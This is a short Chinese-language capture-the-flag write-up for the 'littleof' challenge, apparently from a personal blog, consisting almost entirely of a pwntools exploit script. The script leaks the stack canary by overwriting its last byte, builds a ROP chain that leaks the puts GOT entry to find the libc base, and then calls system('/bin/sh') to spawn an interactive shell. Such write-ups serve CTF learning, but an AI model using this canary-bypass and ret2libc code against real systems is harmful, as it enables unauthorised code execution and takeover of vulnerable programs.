鹤壁杯--littleof

这也是一道retlibc的题目,首先我们需要泄露canary的值。绕过保护。

这里我们覆盖canary的最后一个字节,打印出canary的值。

 1 from pwn import*
 2 #sh = remote("182.116.62.85", 27056)
 3 sh = process('./littleof')
 4 elf = ELF('./littleof')
 5 libc = ELF('./libc-2.27.so')
 6 context.log_level='debug'
 7 
 8 pop_rdi_ret = 0x0400863
 9 main_addr = 0x0400789
10 pop_rsi_r15_ret = 0x0400861
11 
12 payload = 'A'*(0x50-8)
13 
14 sh.recvuntil("?")
15 sh.sendline(payload)
16 sh.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
17 #gdb.attach(sh)
18 canary = u64(sh.recv(8).ljust(8,b'\x00'))
19 
20 payload = 'a'*(0x50-8) + p64(canary) + 'b'*8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)
21 
22 sh.recvuntil("!")
23 sh.sendline(payload)
24 
25 leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
26 libc_base = leak - libc.symbols['puts']
27 sys_addr = libc_base + libc.symbols['system']
28 binsh_addr = libc_base + libc.search('/bin/sh\x00').next()
29 
30 payload = 'D'*(0x50-8)
31 
32 sh.recvuntil("?")
33 sh.sendline(payload)
34 sh.recv()
35 
36 payload = 'c'*(0x50-8) + p64(canary) + 'd'*8 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(pop_rsi_r15_ret) + p64(0)*2 + p64(sys_addr)
37 
38 sh.recvuntil("!")
39 sh.sendline(payload)
40 
41 sh.interactive()

 

posted @ 2022-01-07 16:43  Mua_Uncle_W  阅读(116)  评论(0)    收藏  举报